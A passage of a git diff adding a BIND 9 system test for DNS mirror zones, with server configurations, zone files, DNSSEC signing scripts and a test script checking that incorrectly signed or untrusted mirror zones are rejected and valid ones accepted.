Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. +--> + +This test checks whether zones configured with "type mirror;" behave as +expected. + +ns1 is an authoritative-only server. It only serves the root zone, which is +mirrored by ns3. + +ns2 is an authoritative-only server. It serves a number of zones, some of which +are delegated to it by ns1 and used in recursive resolution tests aimed at ns3 +while others are only served so that ns3 has a primary server to mirror zones +from during various tests of the mirror zone implementation. + +ns3 is a recursive resolver. It has a number of mirror zones configured. This +is the only server whose behavior is being examined by this system test. diff --git a/bin/tests/system/mirror/clean.sh b/bin/tests/system/mirror/clean.sh new file mode 100644 index 0000000..2e02183 --- /dev/null +++ b/bin/tests/system/mirror/clean.sh @@ -0,0 +1,30 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */*.conf +rm -f */*.db +rm -f */*.jnl +rm -f */*.mirror +rm -f */*.nzd* +rm -f */*.prev +rm -f */*.signed +rm -f */K* +rm -f */db-* +rm -f */dsset-* +rm -f */jn-* +rm -f */_default.nzf +rm -f */managed-keys.bind* +rm -f */named.memstats +rm -f */named.run +rm -f dig.out.* +rm -f rndc.out.* diff --git a/bin/tests/system/mirror/ns1/named.conf.in b/bin/tests/system/mirror/ns1/named.conf.in new file mode 100644 index 0000000..5334786 --- /dev/null +++ b/bin/tests/system/mirror/ns1/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; diff --git a/bin/tests/system/mirror/ns1/root.db.in b/bin/tests/system/mirror/ns1/root.db.in new file mode 100644 index 0000000..98ecf1f --- /dev/null +++ b/bin/tests/system/mirror/ns1/root.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA a.root-servers.nil. hostmaster 1 3600 1200 604800 3600 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +example NS ns2.example. +ns2.example. A 10.53.0.2 +initially-unavailable. NS ns2.initially-unavailable. +ns2.initially-unavailable. A 10.53.0.2 diff --git a/bin/tests/system/mirror/ns1/sign.sh b/bin/tests/system/mirror/ns1/sign.sh new file mode 100644 index 0000000..c3affbf --- /dev/null +++ b/bin/tests/system/mirror/ns1/sign.sh @@ -0,0 +1,38 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +( cd ../ns2 && $SHELL -e sign.sh ) + +cp ../ns2/dsset-* . + +zone=. +infile=root.db.in +zonefile=root.db + +keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null) +keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null) + +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Add a trust anchor for a name whose non-existence can be securely proved +# without recursing when the root zone is mirrored. This will exercise code +# attempting to send TAT queries for such names (in ns3). Key data is +# irrelevant here, so just reuse the root zone key generated above. +sed "s/^\./nonexistent./;" $keyname1.key > $keyname1.modified.key + +keyfile_to_static_ds $keyname1 $keyname1.modified > trusted.conf diff --git a/bin/tests/system/mirror/ns2/example.db.in b/bin/tests/system/mirror/ns2/example.db.in new file mode 100644 index 0000000..5472399 --- /dev/null +++ b/bin/tests/system/mirror/ns2/example.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2 hostmaster 1 3600 1200 604800 3600 +@ NS ns2 +ns2 A 10.53.0.2 +foo A 127.0.0.1 +sub NS ns2 diff --git a/bin/tests/system/mirror/ns2/initially-unavailable.db.in b/bin/tests/system/mirror/ns2/initially-unavailable.db.in new file mode 100644 index 0000000..cf809e3 --- /dev/null +++ b/bin/tests/system/mirror/ns2/initially-unavailable.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA a.root-servers.nil. hostmaster 1 3600 1200 604800 3600 +@ NS ns2 +ns2 A 10.53.0.2 +foo CNAME foo.example. diff --git a/bin/tests/system/mirror/ns2/named.conf.in b/bin/tests/system/mirror/ns2/named.conf.in new file mode 100644 index 0000000..5df56c2 --- /dev/null +++ b/bin/tests/system/mirror/ns2/named.conf.in @@ -0,0 +1,85 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "example" { + type primary; + file "example.db.signed"; +}; + +zone "sub.example" { + type primary; + file "sub.example.db.signed"; +}; + +zone "initially-unavailable" { + type primary; + file "initially-unavailable.db.signed"; + allow-transfer { 10.53.0.254; }; +}; + +zone "verify-addzone" { + type primary; + file "verify-addzone.db.original.signed"; +}; + +zone "verify-axfr" { + type primary; + file "verify-axfr.db.signed"; +}; + +zone "verify-csk" { + type primary; + file "verify-csk.db.signed"; +}; + +zone "verify-ixfr" { + type primary; + file "verify-ixfr.db.signed"; + ixfr-from-differences yes; + allow-transfer { 10.53.0.3; }; +}; + +zone "verify-reconfig" { + type primary; + file "verify-reconfig.db.signed"; +}; + +zone "verify-unsigned" { + type primary; + file "verify.db.in"; +}; + +zone "verify-untrusted" { + type primary; + file "verify-untrusted.db.signed"; +}; diff --git a/bin/tests/system/mirror/ns2/sign.sh b/bin/tests/system/mirror/ns2/sign.sh new file mode 100644 index 0000000..2c48f22 --- /dev/null +++ b/bin/tests/system/mirror/ns2/sign.sh @@ -0,0 +1,80 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +keys_to_trust="" + +for zonename in sub.example example initially-unavailable; do + zone=$zonename + infile=$zonename.db.in + zonefile=$zonename.db + + keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null) + keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null) + + cat $infile $keyname1.key $keyname2.key > $zonefile + + $SIGNER -P -g -o $zone $zonefile > /dev/null +done + +# Only add the key for "initially-unavailable" to the list of keys trusted by +# ns3. "example" is expected to be validated using a chain of trust starting in +# the "root" zone on ns1. +keys_to_trust="$keys_to_trust $keyname1" + +# Prepare a zone signed using a Combined Signing Key (CSK) without the SEP bit +# set and add that key to the list of keys to trust. +zone=verify-csk +infile=verify.db.in +zonefile=verify-csk.db + +keyname=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null) +cat $infile $keyname.key > $zonefile +$SIGNER -P -o $zone $zonefile > /dev/null +keys_to_trust="$keys_to_trust $keyname" + +# Prepare remaining zones used in the test. +ORIGINAL_SERIAL=$(awk '$2 == "SOA" {print $5}' verify.db.in) +UPDATED_SERIAL_BAD=$((ORIGINAL_SERIAL + 1)) +UPDATED_SERIAL_GOOD=$((ORIGINAL_SERIAL + 2)) + +for variant in addzone axfr ixfr load reconfig untrusted; do + zone=verify-$variant + infile=verify.db.in + zonefile=verify-$variant.db + + keyname1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -f KSK $zone 2> /dev/null) + keyname2=$($KEYGEN -a ${DEFAULT_ALGORITHM} $zone 2> /dev/null) + + cat $infile $keyname1.key $keyname2.key > $zonefile + + # Prepare a properly signed version of the zone ("*.original.signed"). + $SIGNER -P -o $zone $zonefile > /dev/null + cp $zonefile.signed $zonefile.original.signed + # Prepare a version of the zone with a bogus SOA RRSIG ("*.bad.signed"). + sed "s/${ORIGINAL_SERIAL}/${UPDATED_SERIAL_BAD}/;" $zonefile.signed > $zonefile.bad.signed + # Prepare another properly signed version of the zone ("*.good.signed"). + sed "s/${ORIGINAL_SERIAL}/${UPDATED_SERIAL_GOOD}/;" $zonefile > $zonefile.good + $SIGNER -P -o $zone $zonefile.good > /dev/null + rm -f $zonefile.good + + # Except for the "verify-untrusted" zone, declare the KSK used for + # signing the zone to be a trust anchor for ns3. + if [ "$variant" != "untrusted" ]; then + keys_to_trust="$keys_to_trust $keyname1" + fi +done + +keyfile_to_static_ds $keys_to_trust > trusted-mirror.conf diff --git a/bin/tests/system/mirror/ns2/sub.example.db.in b/bin/tests/system/mirror/ns2/sub.example.db.in new file mode 100644 index 0000000..d2c15c7 --- /dev/null +++ b/bin/tests/system/mirror/ns2/sub.example.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. hostmaster 1 3600 1200 604800 3600 +@ NS ns2.example. +foo A 127.0.0.1 diff --git a/bin/tests/system/mirror/ns2/verify.db.in b/bin/tests/system/mirror/ns2/verify.db.in new file mode 100644 index 0000000..b3ed22a --- /dev/null +++ b/bin/tests/system/mirror/ns2/verify.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2 hostmaster 2000010100 3600 1200 604800 3600 +@ NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/mirror/ns3/named.args b/bin/tests/system/mirror/ns3/named.args new file mode 100644 index 0000000..7519c8f --- /dev/null +++ b/bin/tests/system/mirror/ns3/named.args @@ -0,0 +1 @@ +-D mirror-ns3 -X named.lock -m record,size,mctx -c named.conf -d 99 -g -U 4 -T maxcachesize=2097152 -T tat=3 diff --git a/bin/tests/system/mirror/ns3/named.conf.in b/bin/tests/system/mirror/ns3/named.conf.in new file mode 100644 index 0000000..58d8bd5 --- /dev/null +++ b/bin/tests/system/mirror/ns3/named.conf.in @@ -0,0 +1,101 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + allow-query-cache { 10.53.0.1; }; + trust-anchor-telemetry yes; + allow-new-zones yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "." { + type mirror; + primaries { 10.53.0.1; }; + file "root.db.mirror"; +}; + +zone "initially-unavailable" { + type mirror; + primaries { 10.53.0.2; }; + file "initially-unavailable.db.mirror"; + use-alt-transfer-source no; +}; + +zone "verify-axfr" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-axfr.db.mirror"; +}; + +zone "verify-csk" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-csk.db.mirror"; +}; + +zone "verify-ixfr" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-ixfr.db.mirror"; + masterfile-format text; +}; + +zone "verify-load" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-load.db.mirror"; + masterfile-format text; +}; + +zone "verify-reconfig" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-reconfig.db.mirror"; + masterfile-format text; +}; + +zone "verify-unsigned" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-unsigned.db.mirror"; +}; + +zone "verify-untrusted" { + type mirror; + primaries { 10.53.0.2; }; + file "verify-untrusted.db.mirror"; +}; + +include "../ns1/trusted.conf"; +include "../ns2/trusted-mirror.conf"; diff --git a/bin/tests/system/mirror/setup.sh b/bin/tests/system/mirror/setup.sh new file mode 100644 index 0000000..b91c06d --- /dev/null +++ b/bin/tests/system/mirror/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf + +( cd ns1 && $SHELL -e sign.sh ) + +cat ns2/verify-axfr.db.bad.signed > ns2/verify-axfr.db.signed +cat ns2/verify-load.db.bad.signed > ns3/verify-load.db.mirror diff --git a/bin/tests/system/mirror/tests.sh b/bin/tests/system/mirror/tests.sh new file mode 100644 index 0000000..c93c58d --- /dev/null +++ b/bin/tests/system/mirror/tests.sh @@ -0,0 +1,557 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT} -b 10.53.0.1 +dnssec +time=2 +tries=1 +multi" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# Wait until the transfer of the given zone to ns3 either completes +# successfully or is aborted by a verification failure or a REFUSED response +# from the primary. Note that matching on any transfer status is deliberately +# avoided because some checks performed by this test cause transfer attempts to +# end with the "IXFR failed" status, which is followed by an AXFR retry and +# this test needs to check what the result of the latter transfer attempt is. +wait_for_transfer() { + zone=$1 + for i in 1 2 3 4 5 6 7 8 9 10; do + # Wait until a "freeing transfer context" message is logged + # after one of the transfer results we are looking for is + # logged. This is needed to prevent races when checking for + # "mirror zone is now in use" messages. + nextpartpeek ns3/named.run | \ + awk "matched; /'$zone\/IN'.*Transfer status: (success|verify failure|REFUSED)/ {matched=1}" | \ + grep "'$zone/IN'.*freeing transfer context" > /dev/null && return + sleep 1 + done + echo_i "exceeded time limit waiting for proof of '$zone' being transferred to appear in ns3/named.run" + ret=1 +} + +# Wait until loading the given zone on the given server either completes +# successfully for the specified serial number or fails. +wait_for_load() { + zone=$1 + serial=$2 + log=$3 + for i in 1 2 3 4 5 6 7 8 9 10; do + # Wait until a "zone_postload: (...): done" message is logged + # after one of the loading-related messages we are looking for + # is logged. This is needed to prevent races when checking for + # "mirror zone is now in use" messages. + nextpartpeek $log | \ + awk "matched; /$zone.*(loaded serial $serial|unable to load)/ {matched=1}" | \ + grep "zone_postload: zone $zone/IN: done" > /dev/null && return + sleep 1 + done + echo_i "exceeded time limit waiting for proof of '$zone' being loaded to appear in $log" + ret=1 +} + +# Trigger a reload of ns2 and wait until loading the given zone completes. +reload_zone() { + zone=$1 + serial=$2 + rndc_reload ns2 10.53.0.2 + wait_for_load $zone $serial ns2/named.run +} + +status=0 +n=0 + +ORIGINAL_SERIAL=$(awk '$2 == "SOA" {print $5}' ns2/verify.db.in) +UPDATED_SERIAL_BAD=$((ORIGINAL_SERIAL + 1)) +UPDATED_SERIAL_GOOD=$((ORIGINAL_SERIAL + 2)) + +n=$((n + 1)) +echo_i "checking that an unsigned mirror zone is rejected ($n)" +ret=0 +wait_for_transfer verify-unsigned +$DIG $DIGOPTS @10.53.0.3 +norec verify-unsigned SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "verify-unsigned.*Zone contains no DNSSEC keys" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-unsigned.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone signed using an untrusted key is rejected ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-untrusted +$DIG $DIGOPTS @10.53.0.3 +norec verify-untrusted SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "verify-untrusted.*No trusted DNSKEY found" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-untrusted.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that a mirror zone signed using a CSK without the SEP bit set is accepted ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-csk +$DIG $DIGOPTS @10.53.0.3 +norec verify-csk SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${ORIGINAL_SERIAL}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-csk.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an AXFR of an incorrectly signed mirror zone is rejected ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_transfer verify-axfr +$DIG $DIGOPTS @10.53.0.3 +norec verify-axfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-axfr SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-axfr.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an AXFR of an updated, correctly signed mirror zone is accepted ($n)" +ret=0 +nextpart ns3/named.run > /dev/null +cat ns2/verify-axfr.db.good.signed > ns2/verify-axfr.db.signed +reload_zone verify-axfr ${UPDATED_SERIAL_GOOD} +$RNDCCMD 10.53.0.3 retransfer verify-axfr > /dev/null 2>&1 +wait_for_transfer verify-axfr +$DIG $DIGOPTS @10.53.0.3 +norec verify-axfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-axfr.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an IXFR of an incorrectly signed mirror zone is rejected ($n)" +nextpartreset ns3/named.run +ret=0 +wait_for_transfer verify-ixfr +# Sanity check: the initial, properly signed version of the zone should have +# been announced as coming into effect. +nextpart ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null || ret=1 +# Make a copy of the original zone file for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed ns3/verify-journal.db.mirror +# Wait 1 second so that the zone file timestamp changes and the subsequent +# invocation of "rndc reload" triggers a zone reload. +sleep 1 +cat ns2/verify-ixfr.db.bad.signed > ns2/verify-ixfr.db.signed +reload_zone verify-ixfr ${UPDATED_SERIAL_BAD} +# Make a copy of the bad zone journal for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed.jnl ns3/verify-journal.db.bad.mirror.jnl +# Trigger IXFR. +$RNDCCMD 10.53.0.3 refresh verify-ixfr > /dev/null 2>&1 +wait_for_transfer verify-ixfr +# Ensure the transfer was incremental as expected. +if [ $(nextpartpeek ns3/named.run | grep "verify-ixfr.*got incremental response" | wc -l) -eq 0 ]; then + echo_i "failed: did not get an incremental response" + ret=1 +fi +# Ensure the new, bad version of the zone was not accepted. +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +# A positive answer is expected as the original version of the "verify-ixfr" +# zone should have been successfully verified. +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-ixfr SOA" > /dev/null || ret=1 +# Despite the verification failure for this IXFR, this mirror zone should still +# be in use as its previous version should have been verified successfully. +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is no longer in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that an IXFR of an updated, correctly signed mirror zone is accepted after AXFR failover ($n)" +ret=0 +nextpart ns3/named.run > /dev/null +# Wait 1 second so that the zone file timestamp changes and the subsequent +# invocation of "rndc reload" triggers a zone reload. +sleep 1 +cat ns2/verify-ixfr.db.good.signed > ns2/verify-ixfr.db.signed +reload_zone verify-ixfr ${UPDATED_SERIAL_GOOD} +# Make a copy of the good zone journal for reuse in journal tests below. +cp ns2/verify-ixfr.db.signed.jnl ns3/verify-journal.db.good.mirror.jnl +# Trigger IXFR. +$RNDCCMD 10.53.0.3 refresh verify-ixfr > /dev/null 2>&1 +wait_for_transfer verify-ixfr +# Ensure the new, good version of the zone was accepted. +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +# The log message announcing the mirror zone coming into effect should not have +# been logged this time since the mirror zone in question is expected to +# already be in use before this test case is checked. +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading an incorrectly signed mirror zone from disk fails ($n)" +ret=0 +nextpartreset ns3/named.run +wait_for_load verify-load ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-load SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-load SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-load.*mirror zone is now in use" > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "ensuring trust anchor telemetry queries are sent upstream for a mirror zone ($n)" +ret=0 +# ns3 is started with "-T tat=3", so TAT queries should have already been sent. +grep "_ta-[-0-9a-f]*/NULL" ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a correctly signed mirror zone from disk succeeds ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cat ns2/verify-load.db.good.signed > ns3/verify-load.db.mirror +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-load ${UPDATED_SERIAL_GOOD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-load SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null && ret=1 +grep "${UPDATED_SERIAL_GOOD}.*; serial" dig.out.ns3.test$n > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-load.*mirror zone is now in use" > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that loading a journal for an incorrectly signed mirror zone fails ($n)" +ret=0 +stop_server --use-rndc --port ${CONTROLPORT} ns3 +cp ns3/verify-journal.db.mirror ns3/verify-ixfr.db.mirror +cp ns3/verify-journal.db.bad.mirror.jnl ns3/verify-ixfr.db.mirror.jnl +# Temporarily disable transfers of the "verify-ixfr" zone on ns2. This is +# required to reliably test whether the message announcing the mirror zone +# coming into effect is not logged after a failed journal verification since +# otherwise a corrected version of the zone may be transferred after +# verification fails but before we look for the aforementioned log message. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-ixfr" {$/,/^};$/ { + s/10.53.0.3/10.53.0.254/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +nextpart ns3/named.run > /dev/null +start_server --noclean --restart --port ${PORT} ns3 +wait_for_load verify-ixfr ${UPDATED_SERIAL_BAD} ns3/named.run +$DIG $DIGOPTS @10.53.0.3 +norec verify-ixfr SOA > dig.out.ns3.test$n 2>&1 || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "${UPDATED_SERIAL_BAD}.*; serial" dig.out.ns3.test$n > /dev/null && ret=1 +nextpartpeek ns3/named.run | grep "No correct ${DEFAULT_ALGORITHM} signature for verify-ixfr SOA" > /dev/null || ret=1 +nextpartpeek ns3/named.run | grep "verify-ixfr.*mirror zone is now in use" > /dev/null && ret=1 +# Restore transfers for the "verify-ixfr" zone on ns2. +# (NOTE: Keep the embedded newline in the sed function list below.) +sed '/^zone "verify-ixfr" {$/,/^};$/ { + s/10.53.0.254/10.53.0.3/ +}' ns2/named.conf > ns2/named.conf.modified +mv ns2/named.conf.modified ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +if [ $ret != 0 ]; then echo_i 